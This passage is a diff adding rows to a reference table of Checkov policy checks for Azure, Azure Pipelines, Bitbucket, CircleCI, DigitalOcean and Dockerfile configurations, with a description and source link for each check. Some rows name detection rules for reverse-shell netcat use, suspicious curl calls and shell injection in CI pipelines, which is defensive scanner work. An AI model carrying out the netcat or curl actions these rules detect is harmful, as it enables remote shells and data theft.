+| 2309 | CKV2_AZURE_42            | resource                         | azurerm_postgresql_server                                                                        | Ensure Azure PostgreSQL server is configured with private endpoint                                                                                                                                       | Terraform               | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml)                                             |
+| 2310 | CKV2_AZURE_43            | resource                         | azurerm_mariadb_server                                                                           | Ensure Azure MariaDB server is configured with private endpoint                                                                                                                                          | Terraform               | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml)                                                   |
+| 2311 | CKV2_AZURE_44            | resource                         | azurerm_mysql_server                                                                             | Ensure Azure MySQL server is configured with private endpoint                                                                                                                                            | Terraform               | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml)                                                       |
+| 2312 | CKV2_AZURE_45            | resource                         | azurerm_mssql_server                                                                             | Ensure Microsoft SQL server is configured with private endpoint                                                                                                                                          | Terraform               | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml)                                                       |
+| 2313 | CKV2_AZURE_46            | resource                         | Microsoft.Synapse/workspaces/vulnerabilityAssessments                                            | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | arm                     | [AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py)                                                                         |
+| 2314 | CKV2_AZURE_46            | resource                         | Microsoft.Synapse/workspaces/vulnerabilityAssessments                                            | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Bicep                   | [AzureSynapseWorkspaceVAisEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py)                                                                         |
+| 2315 | CKV2_AZURE_46            | resource                         | azurerm_synapse_workspace_security_alert_policy                                                  | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform               | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                                     |
+| 2316 | CKV2_AZURE_46            | resource                         | azurerm_synapse_workspace_vulnerability_assessment                                               | Ensure that Azure Synapse Workspace vulnerability assessment is enabled                                                                                                                                  | Terraform               | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml)                                                     |
+| 2317 | CKV2_AZURE_47            | resource                         | azurerm_storage_account                                                                          | Ensure storage account is configured without blob anonymous access                                                                                                                                       | Terraform               | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml)                       |
+| 2318 | CKV2_AZURE_48            | resource                         | Microsoft.Databricks/workspaces                                                                  | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption                                                                                                                  | arm                     | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py)                     |
+| 2319 | CKV2_AZURE_48            | resource                         | Microsoft.Databricks/workspaces                                                                  | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption                                                                                                                  | Bicep                   | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py)                     |
+| 2320 | CKV2_AZURE_48            | resource                         | azurerm_databricks_workspace                                                                     | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption                                                                                                                  | Terraform               | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) |
+| 2321 | CKV2_AZURE_49            | resource                         | Microsoft.MachineLearningServices/workspaces                                                     | Ensure that Azure Machine learning workspace is not configured with overly permissive network access                                                                                                     | arm                     | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml)                                                                       |
+| 2322 | CKV2_AZURE_49            | resource                         | azurerm_machine_learning_workspace                                                               | Ensure that Azure Machine learning workspace is not configured with overly permissive network access                                                                                                     | Terraform               | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml)                                                           |
+| 2323 | CKV2_AZURE_50            | resource                         | azurerm_machine_learning_workspace                                                               | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible                                                                                     | Terraform               | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml)                                                     |
+| 2324 | CKV2_AZURE_50            | resource                         | azurerm_storage_account                                                                          | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible                                                                                     | Terraform               | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml)                                                     |
+| 2325 | CKV2_AZURE_51            | resource                         | azurerm_synapse_sql_pool                                                                         | Ensure Synapse SQL Pool has a security alert policy                                                                                                                                                      | Terraform               | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml)                                             |
+| 2326 | CKV2_AZURE_51            | resource                         | azurerm_synapse_sql_pool_security_alert_policy                                                   | Ensure Synapse SQL Pool has a security alert policy                                                                                                                                                      | Terraform               | [SynapseSQLPoolHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasSecurityAlertPolicy.yaml)                                             |
+| 2327 | CKV2_AZURE_52            | resource                         | azurerm_synapse_sql_pool                                                                         | Ensure Synapse SQL Pool has vulnerability assessment attached                                                                                                                                            | Terraform               | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml)                                     |
+| 2328 | CKV2_AZURE_52            | resource                         | azurerm_synapse_sql_pool_security_alert_policy                                                   | Ensure Synapse SQL Pool has vulnerability assessment attached                                                                                                                                            | Terraform               | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml)                                     |
+| 2329 | CKV2_AZURE_52            | resource                         | azurerm_synapse_sql_pool_vulnerability_assessment                                                | Ensure Synapse SQL Pool has vulnerability assessment attached                                                                                                                                            | Terraform               | [SynapseSQLPoolHasVulnerabilityAssessment.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseSQLPoolHasVulnerabilityAssessment.yaml)                                     |
+| 2330 | CKV2_AZURE_53            | resource                         | azurerm_synapse_workspace                                                                        | Ensure Azure Synapse Workspace has extended audit logs                                                                                                                                                   | Terraform               | [SynapseWorkspaceHasExtendedAuditLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseWorkspaceHasExtendedAuditLogs.yaml)                                             |
+| 2331 | CKV2_AZURE_54            | resource                         | azurerm_synapse_sql_pool                                                                         | Ensure log monitoring is enabled for Synapse SQL Pool                                                                                                                                                    | Terraform               | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml)                                           |
+| 2332 | CKV2_AZURE_54            | resource                         | azurerm_synapse_sql_pool_extended_auditing_policy                                                | Ensure log monitoring is enabled for Synapse SQL Pool                                                                                                                                                    | Terraform               | [SynapseLogMonitoringEnabledForSQLPool.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SynapseLogMonitoringEnabledForSQLPool.yaml)                                           |
+| 2333 | CKV_AZUREPIPELINES_1     | azure_pipelines                  | jobs                                                                                             | Ensure container job uses a non latest version tag                                                                                                                                                       | Azure Pipelines         | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py)                                                                                              |
+| 2334 | CKV_AZUREPIPELINES_1     | azure_pipelines                  | stages[].jobs[]                                                                                  | Ensure container job uses a non latest version tag                                                                                                                                                       | Azure Pipelines         | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py)                                                                                              |
+| 2335 | CKV_AZUREPIPELINES_2     | azure_pipelines                  | jobs                                                                                             | Ensure container job uses a version digest                                                                                                                                                               | Azure Pipelines         | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py)                                                                                                    |
+| 2336 | CKV_AZUREPIPELINES_2     | azure_pipelines                  | stages[].jobs[]                                                                                  | Ensure container job uses a version digest                                                                                                                                                               | Azure Pipelines         | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py)                                                                                                    |
+| 2337 | CKV_AZUREPIPELINES_3     | azure_pipelines                  | jobs[].steps[]                                                                                   | Ensure set variable is not marked as a secret                                                                                                                                                            | Azure Pipelines         | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py)                                                                                                |
+| 2338 | CKV_AZUREPIPELINES_3     | azure_pipelines                  | stages[].jobs[].steps[]                                                                          | Ensure set variable is not marked as a secret                                                                                                                                                            | Azure Pipelines         | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py)                                                                                                |
+| 2339 | CKV_AZUREPIPELINES_5     | azure_pipelines                  | *.container[]                                                                                    | Detecting image usages in azure pipelines workflows                                                                                                                                                      | Azure Pipelines         | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py)                                                                                                |
+| 2340 | CKV_AZUREPIPELINES_5     | azure_pipelines                  | jobs[]                                                                                           | Detecting image usages in azure pipelines workflows                                                                                                                                                      | Azure Pipelines         | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py)                                                                                                |
+| 2341 | CKV_AZUREPIPELINES_5     | azure_pipelines                  | stages[].jobs[]                                                                                  | Detecting image usages in azure pipelines workflows                                                                                                                                                      | Azure Pipelines         | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py)                                                                                                |
+| 2342 | CKV_BCW_1                | provider                         | bridgecrew                                                                                       | Ensure no hard coded API token exist in the provider                                                                                                                                                     | Terraform               | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py)                                                                                                  |
+| 2343 | CKV_BITBUCKET_1          | bitbucket_configuration          | *                                                                                                | Merge requests should require at least 2 approvals                                                                                                                                                       | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py)                                                                                            |
+| 2344 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines              | [{image:image,__startline__:__startline__,__endline__:__endline__}]                              | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | bitbucket_pipelines     | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py)                                                                                                          |
+| 2345 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines              | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | bitbucket_pipelines     | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py)                                                                                                          |
+| 2346 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines              | pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__}   | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | bitbucket_pipelines     | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py)                                                                                                          |
+| 2347 | CKV_CIRCLECIPIPELINES_1  | circleci_pipelines               | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}            | Ensure the pipeline image uses a non latest version tag                                                                                                                                                  | circleci_pipelines      | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py)                                                                                                           |
+| 2348 | CKV_CIRCLECIPIPELINES_2  | circleci_pipelines               | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}            | Ensure the pipeline image version is referenced via hash not arbitrary tag.                                                                                                                              | circleci_pipelines      | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py)                                                                                       |
+| 2349 | CKV_CIRCLECIPIPELINES_3  | circleci_pipelines               | orbs.{orbs: @}                                                                                   | Ensure mutable development orbs are not used.                                                                                                                                                            | circleci_pipelines      | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py)                                                                                   |
+| 2350 | CKV_CIRCLECIPIPELINES_4  | circleci_pipelines               | orbs.{orbs: @}                                                                                   | Ensure unversioned volatile orbs are not used.                                                                                                                                                           | circleci_pipelines      | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py)                                                                                         |
+| 2351 | CKV_CIRCLECIPIPELINES_5  | circleci_pipelines               | jobs.*.steps[]                                                                                   | Suspicious use of netcat with IP address                                                                                                                                                                 | circleci_pipelines      | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py)                                                                                               |
+| 2352 | CKV_CIRCLECIPIPELINES_6  | circleci_pipelines               | jobs.*.steps[]                                                                                   | Ensure run commands are not vulnerable to shell injection                                                                                                                                                | circleci_pipelines      | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py)                                                                                                       |
+| 2353 | CKV_CIRCLECIPIPELINES_7  | circleci_pipelines               | jobs.*.steps[]                                                                                   | Suspicious use of curl in run task                                                                                                                                                                       | circleci_pipelines      | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py)                                                                                             |
+| 2354 | CKV_CIRCLECIPIPELINES_8  | circleci_pipelines               | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}       | Detecting image usages in circleci pipelines                                                                                                                                                             | circleci_pipelines      | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py)                                                                                                 |
+| 2355 | CKV_CIRCLECIPIPELINES_8  | circleci_pipelines               | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}            | Detecting image usages in circleci pipelines                                                                                                                                                             | circleci_pipelines      | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py)                                                                                                 |
+| 2356 | CKV_DIO_1                | resource                         | digitalocean_spaces_bucket                                                                       | Ensure the Spaces bucket has versioning enabled                                                                                                                                                          | Terraform               | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py)                                                                          |
+| 2357 | CKV_DIO_2                | resource                         | digitalocean_droplet                                                                             | Ensure the droplet specifies an SSH key                                                                                                                                                                  | Terraform               | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py)                                                                                          |
+| 2358 | CKV_DIO_3                | resource                         | digitalocean_spaces_bucket                                                                       | Ensure the Spaces bucket is private                                                                                                                                                                      | Terraform               | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py)                                                                          |
+| 2359 | CKV_DIO_4                | resource                         | digitalocean_firewall                                                                            | Ensure the firewall ingress is not wide open                                                                                                                                                             | Terraform               | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py)                                                                                |
+| 2360 | CKV_DOCKER_1             | dockerfile                       | EXPOSE                                                                                           | Ensure port 22 is not exposed                                                                                                                                                                            | dockerfile              | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py)                                                                                                                   |
+| 2361 | CKV_DOCKER_2             | dockerfile                       | *                                                                                                | Ensure that HEALTHCHECK instructions have been added to container images                                                                                                                                 | dockerfile              | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py)                                                                                                         |
+| 2362 | CKV_DOCKER_3             | dockerfile                       | *                                                                                                | Ensure that a user for the container has been created                                                                                                                                                    | dockerfile              | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py)                                                                                                                       |
+| 2363 | CKV_DOCKER_4             | dockerfile                       | ADD                                                                                              | Ensure that COPY is used instead of ADD in Dockerfiles                                                                                                                                                   | dockerfile              | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py)                                                                                                                         |
+| 2364 | CKV_DOCKER_5             | dockerfile                       | RUN                                                                                              | Ensure update instructions are not use alone in the Dockerfile                                                                                                                                           | dockerfile              | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py)                                                                                                               |
+| 2365 | CKV_DOCKER_6             | dockerfile                       | MAINTAINER                                                                                       | Ensure that LABEL maintainer is used instead of MAINTAINER (deprecated)                                                                                                                                  | dockerfile              | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py)                                                                                                           |
+| 2366 | CKV_DOCKER_7             | dockerfile                       | FROM                                                                                             | Ensure the base image uses a non latest version tag                                                                                                                                                      | dockerfile              | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py)                                                                                                       |
+| 2367 | CKV_DOCKER_8             | dockerfile                       | USER                                                                                             | Ensure the last USER is not root                                                                                                                                                                         | dockerfile              | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py)                                                                                                                           |
+| 2368 | CKV_DOCKER_9             | dockerfile                       | RUN                                                                                              | Ensure that APT isn't used                                                                                                                                                                               | dockerfile              | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py)                                                                                                                     |
+| 2369 | CKV_DOCKER_10            | dockerfile                       | WORKDIR                                                                                          | Ensure that WORKDIR values are absolute paths                                                                                                                                                            | dockerfile              | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py)                                                                                                         |
+| 2370 | CKV_DOCKER_11            | dockerfile                       | FROM                                                                                             | Ensure From Alias are unique for multistage builds.                                                                                                                                                      | dockerfile              | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py)                                                                                                                 |
+| 2371 | CKV2_DOCKER_1            | resource                         | RUN                                                                                              | Ensure that sudo isn't used                                                                                                                                                                              | dockerfile              | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml)                                                                                                  |
+| 2372 | CKV2_DOCKER_2            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with curl                                                                                                                                              | dockerfile              | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml)                                                                                                |
+| 2373 | CKV2_DOCKER_3            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with wget                                                                                                                                              | dockerfile              | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml)                                                                                                |
+| 2374 | CKV2_DOCKER_4            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option                                                                                                                   | dockerfile              | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml)                                                                                        |
+| 2375 | CKV2_DOCKER_5            | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable                                                                                                        | dockerfile              | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml)                                                                                  |
+| 2376 | CKV2_DOCKER_5            | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable                                                                                                        | dockerfile              | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml)                                                                                  |
+| 2377 | CKV2_DOCKER_5            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable                                                                                                        | dockerfile              | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml)                                                                                  |
+| 2378 | CKV2_DOCKER_6            | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable                                                                                             | dockerfile              | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml)                                                                  |
+| 2379 | CKV2_DOCKER_6            | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable                                                                                             | dockerfile              | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml)                                                                  |
+| 2380 | CKV2_DOCKER_6            | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable                                                                                             | dockerfile              | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml)                                                                  |
+| 2381 | CKV2_DOCKER_7            | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option                                                                                         | dockerfile              | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml)                                                                                  |
+| 2382 | CKV2_DOCKER_8            | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option                                                                               | dockerfile              | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml)                                                                |
+| 2383 | CKV2_DOCKER_9            | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option                                                                            | dockerfile              | [RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml)                                                                                          |
+| 2384 | CKV2_DOCKER_10           | resource                         | RUN                                                                                              | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options                                           | dockerfile              | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml)                                                                                        |
+| 2385 | CKV2_DOCKER_11           | resource                         | RUN                                                                                              | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state                  | dockerfile              | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml)                                                                                        |
+| 2386 | CKV2_DOCKER_12           | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable                                                                                           | dockerfile              | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml)                                                                                |
+| 2387 | CKV2_DOCKER_12           | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable                                                                                           | dockerfile              | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml)                                                                                |
+| 2388 | CKV2_DOCKER_12           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable                                                                                           | dockerfile              | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml)                                                                                |
+| 2389 | CKV2_DOCKER_13           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false                                                                                              | dockerfile              | [RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml)                                                                          |
+| 2390 | CKV2_DOCKER_14           | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value                                                                           | dockerfile              | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml)                                                                                        |
+| 2391 | CKV2_DOCKER_14           | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value                                                                           | dockerfile              | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml)                                                                                        |
+| 2392 | CKV2_DOCKER_14           | resource                         | RUN                                                                                              | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value                                                                           | dockerfile              | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml)                                                                                        |
+| 2393 | CKV2_DOCKER_15           | resource                         | RUN                                                                                              | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option                                                           | dockerfile              | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml)                                                                  |
+| 2394 | CKV2_DOCKER_16           | resource                         | ARG                                                                                              | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable                                                                                               | dockerfile              | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml)                                                                                        |
+| 2395 | CKV2_DOCKER_16           | resource                         | ENV                                                                                              | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable                                                                                               | dockerfile              | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml)                                                                                        |
